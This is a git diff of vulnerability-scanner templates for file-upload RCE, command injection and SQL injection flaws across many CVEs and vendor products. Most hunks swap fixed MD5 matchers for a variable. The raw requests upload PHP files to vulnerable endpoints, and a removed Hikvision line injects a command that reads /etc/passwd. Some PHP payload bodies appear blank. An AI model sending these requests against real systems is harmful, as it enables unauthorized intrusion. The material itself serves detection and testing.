diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml
index 049664ecc2..aa761fc5f5 100644
--- a/http/cnvd/2021/CNVD-2021-49104.yaml
+++ b/http/cnvd/2021/CNVD-2021-49104.yaml
@@ -17,6 +17,9 @@ info:
max-request: 2
tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive
+variables:
+ string: "{{randstr}}"
+
http:
- raw:
- |
@@ -28,7 +31,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
-
+
--e64bdf16c554bbc109cecef6451c26a4--
- |
@@ -37,6 +40,10 @@ http:
matchers-condition: and
matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5(string)}}'
- type: word
part: body
words:
diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml
index f27d31a96a..7649d2b702 100644
--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@@ -30,6 +30,9 @@ info:
product: php
tags: cve,cve2012,kev,vulhub,rce,php
+variables:
+ string: "CVE-2012-1823"
+
http:
- raw:
- |
@@ -37,16 +40,13 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
-
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "3d638155445bffb044eec401381ad784"
+ - '{{md5(string)}}'
- - type: status
- status:
- - 200
# digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml
index 3c12870fda..aeaf623907 100644
--- a/http/cves/2017/CVE-2017-6090.yaml
+++ b/http/cves/2017/CVE-2017-6090.yaml
@@ -28,6 +28,9 @@ info:
shodan-query: http.title:"PhpCollab"
tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
+variables:
+ string: "CVE-2017-6090"
+
http:
- raw:
- |
@@ -39,7 +42,7 @@ http:
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php
-
+
-----------------------------154934846911423734231554128137--
- |
@@ -49,9 +52,9 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - "48dbd2384cb6b996fa1e2855c7f0567f"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml
index c521f6727c..54e72b5634 100644
--- a/http/cves/2017/CVE-2017-9841.yaml
+++ b/http/cves/2017/CVE-2017-9841.yaml
@@ -27,6 +27,9 @@ info:
product: phpunit
tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project
+variables:
+ string: "CVE-2017-9841"
+
http:
- raw:
- |
@@ -34,44 +37,44 @@ http:
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
- |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}}
Content-Type: text/html
-
+
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "6dd70f16549456495373a337e6708865"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml
index c8d8d0c2d1..a5447efae9 100644
--- a/http/cves/2020/CVE-2020-28871.yaml
+++ b/http/cves/2020/CVE-2020-28871.yaml
@@ -29,6 +29,9 @@ info:
product: monitorr
tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project
+variables:
+ string: "CVE-2020-28871"
+
http:
- raw:
- |
@@ -47,7 +50,7 @@ http:
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif
- GIF89a213213123
+ GIF89a213213123
-----------------------------31046105003900160576454225745--
- |
@@ -59,7 +62,7 @@ http:
- type: word
part: body_2
words:
- - "d03c180355b797069cc047ff5606d689"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml
index ef3a669263..500d2250f0 100644
--- a/http/cves/2021/CVE-2021-24145.yaml
+++ b/http/cves/2021/CVE-2021-24145.yaml
@@ -30,6 +30,9 @@ info:
framework: wordpress
tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
+variables:
+ string: "CVE-2021-24145"
+
http:
- raw:
- |
@@ -48,7 +51,7 @@ http:
Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
Content-Type: text/csv
-
+
-----------------------------132370916641787807752589698875
Content-Disposition: form-data; name="mec-ix-action"
@@ -61,10 +64,8 @@ http:
matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - contains(header_3, "text/html")
- - status_code_3 == 200
- - contains(body_3, 'CVE-2021-24145')
- condition: and
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
# digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml
index d670c0c1cb..3b716eb4ac 100644
--- a/http/cves/2021/CVE-2021-24236.yaml
+++ b/http/cves/2021/CVE-2021-24236.yaml
@@ -1,4 +1,4 @@
-id: "CVE-2021-24236"
+id: CVE-2021-24236
info:
name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
@@ -29,9 +29,11 @@ info:
product: imagements
framework: wordpress
tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
+
variables:
php: "{{to_lower('{{randstr}}')}}.php"
post: "1"
+ string: "CVE-2021-24236"
http:
- raw:
@@ -68,7 +70,7 @@ http:
Content-Disposition: form-data; name="image"; filename="{{php}}"
Content-Type: image/jpeg
-
+
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="submit"
@@ -91,5 +93,6 @@ http:
- type: word
part: body_2
words:
- - "CVE-2021-24236"
+ - '{{md5(string)}}'
+
# digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml
index 6c0d968b2d..b43a5c4148 100644
--- a/http/cves/2021/CVE-2021-24284.yaml
+++ b/http/cves/2021/CVE-2021-24284.yaml
@@ -31,10 +31,12 @@ info:
product: kaswara
framework: wordpress
tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project
+
variables:
zip_file: "{{to_lower(rand_text_alpha(6))}}"
php_file: "{{to_lower(rand_text_alpha(2))}}.php"
- php_cmd: ""
+ string: "CVE-2021-24284"
+ php_cmd: ""
http:
- raw:
@@ -71,7 +73,7 @@ http:
- type: word
part: body_2
words:
- - "phpinfo()"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml
index a77f371ed5..297fbf73b6 100644
--- a/http/cves/2021/CVE-2021-24499.yaml
+++ b/http/cves/2021/CVE-2021-24499.yaml
@@ -30,6 +30,9 @@ info:
framework: wordpress
tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech
+variables:
+ string: "CVE-2021-24499"
+
http:
- raw:
- |
@@ -46,7 +49,7 @@ http:
Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
Content-Type: application/x-httpd-php
-
+
-----------------------------cd0dc6bdc00b1cf9--
- |
GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
@@ -57,7 +60,7 @@ http:
- type: word
part: body
words:
- - "71abe5077dae2754c36d731cc1534d4d"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml
index 7ed41ae206..70c378a563 100644
--- a/http/cves/2021/CVE-2021-36260.yaml
+++ b/http/cves/2021/CVE-2021-36260.yaml
@@ -30,6 +30,9 @@ info:
shodan-query: http.favicon.hash:999357577
tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
+variables:
+ string: "{{to_lower(rand_base(12))}}"
+
http:
- raw:
- |
@@ -37,15 +40,15 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- $(cat /etc/passwd>webLib/x)
+ $(echo {{string}}>webLib/x)
- |
GET /x HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- - type: regex
- part: body
- regex:
- - "root:.*:0:0:"
+ - type: word
+ part: body_2
+ words:
+ - "{{string}}"
# digest: 4a0a0047304502201b310c74c0ecade6660855e689efe3fa564362a2328cdf4ee738863363e0b7c7022100b519bac287cc3e8a6a3cd1187daf969b5f5baf0a2ec9be7adb3344e95561dfc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml
index 3ee7ed2562..b42bf1bf16 100644
--- a/http/cves/2021/CVE-2021-40870.yaml
+++ b/http/cves/2021/CVE-2021-40870.yaml
@@ -29,6 +29,9 @@ info:
product: controller
tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload
+variables:
+ string: "CVE-2021-40870"
+
http:
- raw:
- |
@@ -36,7 +39,7 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=
+ CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=
- |
GET /v1/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
@@ -45,8 +48,9 @@ http:
matchers-condition: and
matchers:
- type: word
+ part: body_2
words:
- - '0d95513363fd69b9fee712f333293654'
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml
index f42d8daa3a..8e70fb2c4d 100644
--- a/http/cves/2022/CVE-2022-1952.yaml
+++ b/http/cves/2022/CVE-2022-1952.yaml
@@ -32,6 +32,9 @@ info:
framework: wordpress
tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics
+variables:
+ string: "CVE-2022-1952"
+
http:
- raw:
- |
@@ -56,7 +59,7 @@ http:
Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
--------------------------98efee55508c5059--
- |
@@ -68,13 +71,10 @@ http:
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - contains(header_3, "text/html")
- - status_code_3 == 200
- - contains(body_1, 'success\":true')
- - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
- condition: and
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml
index d24b4dd4cb..b661e227aa 100644
--- a/http/cves/2022/CVE-2022-25487.yaml
+++ b/http/cves/2022/CVE-2022-25487.yaml
@@ -28,7 +28,10 @@ info:
max-request: 2
vendor: thedigitalcraft
product: atomcms
- tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft
+ tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload
+
+variables:
+ string: "CVE-2022-25487"
http:
- raw:
@@ -46,7 +49,7 @@ http:
Content-Type: image/jpeg
-
+
-----------------------------30623082103363803402542706041--
- |
GET /uploads/{{filename}} HTTP/1.1
@@ -57,16 +60,7 @@ http:
- type: word
part: body
words:
- - 7ee3686858eb89dd68ccf85f0ea03abe
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml
index 6673fdf773..6de5abe469 100644
--- a/http/cves/2022/CVE-2022-3982.yaml
+++ b/http/cves/2022/CVE-2022-3982.yaml
@@ -30,6 +30,9 @@ info:
framework: wordpress
tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart
+variables:
+ string: "CVE-2022-3982"
+
http:
- raw:
- |
@@ -64,7 +67,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
--------------------------1cada150a8151a54--
- |
@@ -72,12 +75,10 @@ http:
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - contains(header_3, "text/html")
- - status_code_3 == 200
- - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
- condition: and
+ - type: word
+ part: body_3
+ words:
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml
index 437768ea4f..4af25f095d 100644
--- a/http/cves/2022/CVE-2022-4328.yaml
+++ b/http/cves/2022/CVE-2022-4328.yaml
@@ -25,7 +25,10 @@ info:
vendor: najeebmedia
product: woocommerce_checkout_field_manager
framework: wordpress
- tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia
+ tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload
+
+variables:
+ string: "CVE-2022-4328"
http:
- raw:
@@ -38,7 +41,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
--------------------------22728be7b3104597--
- |
@@ -48,16 +51,8 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- - fe5df26ce4ca0056ffae8854469c282f
+ - '{{md5(string)}}'
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
# digest: 4b0a00483046022100f22baef697a8a8d3b9cd970350ff7726ecc8317f7519fc4fc7986bc3b90deb640221009b219b5e2ad6ff59b71ad028d818ae581463c01d52d7f535c7efac3e81d60bc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
index 946523a074..886f847b73 100644
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -31,9 +31,9 @@ info:
product: jorani
shodan-query: http.favicon.hash:-2032163853
tags: cve2023,cve,jorani,rce,packetstorm
+
variables:
- cmd: "id"
- payload: ""
+ payload: ""
header: "{{to_upper(rand_base(12))}}"
http:
@@ -51,14 +51,14 @@ http:
GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
Host: {{Hostname}}
X-REQUESTED-WITH: XMLHttpRequest
- {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
+ {{header}}: CVE-2023-26469
matchers-condition: and
matchers:
- - type: regex
- part: body_3
- regex:
- - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)'
+ - type: word
+ part: body
+ words:
+ - '7cca0844e81cd333152def045fe075c2'
- type: status
part: header_3
diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml
index 8d345d1047..44550aa5ad 100644
--- a/http/cves/2023/CVE-2023-2648.yaml
+++ b/http/cves/2023/CVE-2023-2648.yaml
@@ -33,6 +33,7 @@ info:
tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive
variables:
file: '{{rand_base(5, "abc")}}'
+ string: "CVE-2023-2648"
http:
- raw:
@@ -46,7 +47,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
Content-Type: image/jpeg
-
+
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
- |
POST /attachment/{{name}}/{{file}}.php HTTP/1.1
@@ -57,7 +58,7 @@ http:
- type: word
part: body_2
words:
- - "747711c62dffae7dbf726d8241bd07fe"
+ - '{{md5(string)}}'
- type: status
part: body_2
diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml
index 749d794105..3003904fc3 100644
--- a/http/cves/2023/CVE-2023-33440.yaml
+++ b/http/cves/2023/CVE-2023-33440.yaml
@@ -30,8 +30,10 @@ info:
vendor: faculty_evaluation_system_project
product: faculty_evaluation_system
tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project
+
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
+ string: "CVE-2023-33440"
http:
- raw:
@@ -56,7 +58,7 @@ http:
Content-Disposition: form-data; name="img"; filename="{{randstr}}.php"
Content-Type: application/octet-stream
-
+
-----------------------------1037163726497
Content-Disposition: form-data; name="email"
diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml
index 84505cd89b..33c84f6147 100644
--- a/http/cves/2023/CVE-2023-35885.yaml
+++ b/http/cves/2023/CVE-2023-35885.yaml
@@ -30,11 +30,12 @@ info:
vendor: mgt-commerce
product: cloudpanel
shodan-query: title:"Cloudpanel"
- tags: cve2023,cve,cloudpanel,rce,instrusive,mgt-commerce
+ tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload
+
variables:
session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY="
str1: "{{rand_base(10)}}"
- str2: "{{randstr}}"
+ string: "CVE-2023-35885"
http:
- raw:
@@ -55,7 +56,7 @@ http:
Cookie: clp-fm={{session}}
Content-Type: application/x-www-form-urlencoded
- id=/htdocs/app/files/public/{{str1}}.php&content=
+ id=/htdocs/app/files/public/{{str1}}.php&content=
- |
POST /file-manager/backend/permissions HTTP/1.1
Host: {{Hostname}}
@@ -68,7 +69,8 @@ http:
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - body_5 == str2
+ - type: word
+ part: body_5
+ words:
+ - '{{md5(string)}}'
# digest: 4a0a00473045022100a045e62170736a2a8aeec80f23c92eb2dfbb4704e093df2e6fa248efe9b5b13a02205561485b4abcd5c2e85f585adb82c3e1234a7a623a068b389b548de0887da802:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml
index 7b6f67cc0a..11414b79c3 100644
--- a/http/cves/2023/CVE-2023-36844.yaml
+++ b/http/cves/2023/CVE-2023-36844.yaml
@@ -32,8 +32,8 @@ info:
shodan-query: title:"Juniper Web Device Manager"
tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
variables:
- value: "CVE-2023-36844"
- payload: "('')"
+ string: "CVE-2023-36844"
+ payload: "('')"
http:
- raw:
@@ -65,7 +65,7 @@ http:
- type: word
part: body_3
words:
- - '{{md5(value)}}'
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml
index 4bdfc8b4ea..8703194184 100644
--- a/http/cves/2023/CVE-2023-37629.yaml
+++ b/http/cves/2023/CVE-2023-37629.yaml
@@ -28,6 +28,9 @@ info:
product: simple_online_piggery_management_system
tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
+variables:
+ string: "CVE-2023-37629"
+
http:
- raw:
- |
@@ -67,7 +70,7 @@ http:
Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
Content-Type: application/x-php
-
+
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="submit"
diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml
index 71102a69f7..960c41b024 100644
--- a/http/cves/2023/CVE-2023-4596.yaml
+++ b/http/cves/2023/CVE-2023-4596.yaml
@@ -29,6 +29,9 @@ info:
publicwww-query: /wp-content/plugins/Forminator
tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
+variables:
+ string: "CVE-2023-4596"
+
http:
- raw:
- |
@@ -60,7 +63,7 @@ http:
Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
Content-Type: application/x-php
-
+
------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="forminator_nonce"
diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml
index 1b175f2c8d..33a57bcdfc 100644
--- a/http/cves/2023/CVE-2023-5360.yaml
+++ b/http/cves/2023/CVE-2023-5360.yaml
@@ -29,8 +29,10 @@ info:
framework: wordpress
publicwww-query: "/plugins/royal-elementor-addons/"
tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
+
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
+ string: "CVE-2023-5360"
http:
- raw:
@@ -46,7 +48,7 @@ http:
Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
Content-Type: image/png
-
+
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="allowed_file_types"
@@ -69,17 +71,7 @@ http:
- type: word
part: body_3
words:
- - "86398d3a90432d24901a7bbdcf1ab2ba"
- condition: and
-
- - type: word
- part: header_3
- words:
- - "text/html"
-
- - type: status
- status:
- - 200
+ - '{{md5(string)}}'
extractors:
- type: regex
diff --git a/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
index 223d60ffcd..9307cb3420 100644
--- a/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
+++ b/http/vulnerabilities/other/core-chuangtian-cloud-rce.yaml
@@ -14,6 +14,8 @@ info:
metadata:
max-request: 2
tags: rce,fileupload,intrusive,cloud,chuangtian
+variables:
+ string: "core-chuangtian-cloud-rce"
http:
- raw:
@@ -29,17 +31,16 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: image/avif
-
+
------WebKitFormBoundaryfcKRltGv--
- |
GET /Upload/test/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")'
- - 'status_code_2 == 200'
- condition: and
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(string)}}'
# digest: 4a0a00473045022066f84a24609e8aff18468dae4751d89b3367da8fbc9482995f7e6a21e3ae3795022100d4a6ce892231c551e62bdf99206ef5fad32891d92eea97c3d5bfd5ff5afc21eb:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
index b96448909a..f598b35a0f 100644
--- a/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+++ b/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
@@ -12,10 +12,11 @@ info:
verified: true
max-request: 2
fofa-query: app="Ruijie-NBR路由器"
- tags: ruijie,file-upload,intrusive,nbr
+ tags: ruijie,fileupload,intrusive,nbr
+
variables:
filename: "{{rand_base(6)}}"
- string: "{{rand_base(5)}}"
+ string: "ruijie-nbr-fileupload"
http:
- raw:
@@ -26,16 +27,15 @@ http:
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: image/jpeg
-
+
- |
GET /ddi/server/upload/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- - type: dsl
- dsl:
- - status_code_1 == 200 && contains(body_1,"jsonrpc")
- - status_code_2 == 200 && contains(body_2,"{{string}}")
- condition: and
+ - type: word
+ part: body_2
+ words:
+ - '{{md5(string)}}'
# digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
index 1b72a6aaed..7b0cf9f5ed 100644
--- a/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
+++ b/http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
@@ -16,8 +16,8 @@ info:
tags: secgate,3600,firewall,file-upload,intrusive
variables:
filename: "{{rand_base(6)}}"
- string: "{{randstr}}"
file-upload: "{{rand_base(5)}}"
+ string: "secgate-3600-file-upload"
http:
- raw:
@@ -37,7 +37,7 @@ http:
Content-Disposition: form-data; name="upfile"; filename="{{filename}}.php"
Content-Type: text/plain
-
+
------WebKitFormBoundary{{string}}
Content-Disposition: form-data; name="submit_post"
@@ -54,11 +54,9 @@ http:
matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - status_code_2 == 200
- - contains(body_2,'{{file-upload}}')
- - contains(header_2,'text/html')
- condition: and
+ - type: word
+ part: body
+ words:
+ - '{{md5(string)}}'
# digest: 490a00463044022000f7a446804d16688a2e6bd0ecb4c39abb59795da8559f0eff1c5c086fccd253022048085bb0719b371f98e0f447f501fa1b27dd721f6314c35ff9c42c22058b1d93:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
index 8e218e585c..50daa13856 100644
--- a/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
+++ b/http/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
@@ -15,21 +15,22 @@ info:
max-request: 2
tags: thinkcmf,rce,intrusive
+variables:
+ string: "thinkcmf-rce"
+
http:
- raw:
- |
- GET /index.php?a=fetch&content={{url_encode('
+
------WebKitFormBoundaryjhddzlqp
Content-Disposition: form-data; name="mufile"
@@ -59,10 +60,10 @@ http:
- type: word
part: body_2
words:
- - '{{md5(num)}}'
+ - '{{md5(string)}}'
- type: status
status:
- 200
-# digest: 4a0a00473045022100e53af2a9b597177c6590d5421bd6fed3519580906d268c42829a6900818c1bc902202ed7ad372d48b979e5b41259401514d376746f5bce485696a84f4c387845d04b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e53af2a9b597177c6590d5421bd6fed3519580906d268c42829a6900818c1bc902202ed7ad372d48b979e5b41259401514d376746f5bce485696a84f4c387845d04b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
index dd6992c352..88ea4b04eb 100755
--- a/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+++ b/http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
@@ -14,9 +14,11 @@ info:
max-request: 2
fofa-query: app="泛微-EOffice"
tags: weaver,e-office,oa,sqli
+
variables:
filename: "{{to_lower(rand_base(5))}}"
- payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
+ string: "weaver-group-xml-sqli"
+ payload: "[group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/{{filename}}.php']"
http:
- raw:
@@ -33,7 +35,7 @@ http:
- type: word
part: body_2
words:
- - "758058d8987e7a9ec723bcdbec6c407e"
+ - '{{md5(string)}}'
- type: status
status:
diff --git a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
index 10a49577d8..281bba93fc 100755
--- a/http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
